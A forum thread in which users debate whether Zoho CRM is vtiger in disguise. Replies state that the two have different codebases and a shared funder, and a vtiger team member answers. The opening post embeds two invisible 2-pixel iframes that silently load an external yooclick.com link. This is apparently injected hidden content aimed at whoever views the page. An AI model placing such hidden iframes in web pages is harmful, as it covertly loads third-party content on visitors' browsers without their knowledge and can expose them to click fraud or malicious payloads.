Is ZOHOCRM VTIGER in disguise ? And if so why...

... would they be permitted to make commercial use of the software

... would they be permitted to not include the vtiger "powereed by" credit

Unless of course they have just written a competitor package that looks almost identical for some reason. Anyone know what is going on ? <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

• 8 Comments sorted by Votes Date Added
  • i'm not sure if they are the same product, but if you look at the front page of the vtiger site you will see an add for zoho crm with a tag saying that zoho crm is a vtiger sponser.
  • thanks, andrew.

found this in their forum:
    please be informed that zoho crm is built from scratch and there is no vtiger code involved in it.

btw, zoho crm is on-demand version, which support multi-tenant and vtiger does not support multi-tenant.

hope i'm clear.

peter

at this topic post.

guess this explains why they don't carry the vtiger logo !
    alos means that there is no relationship between them so kind of weird that vtigercrm let's them market against their userbase. maybe there is some kind of corporate relationship out there somewhere... guess it doesn't really matter.
  • zoho crm and vtiger are funded by the same company adventnet. zoho crm is built on java while vtiger is php based. the code bases are completely different.

raju
  • i think vtiger is bait for zohocrm. the broken one is free, the good one costs money.
  • hi racassel,

we would not support this comparison.

vtiger crm is evolving with its own feature set and our team is putting energy to make it better and better.

regards,
    prasad
    vtiger team
  • have to say though. zoho's interface is much faster. or at least it appears that way.
  • zoho is hosted and your data is on someone else's server. i like zoho, but i also like having control of my own data.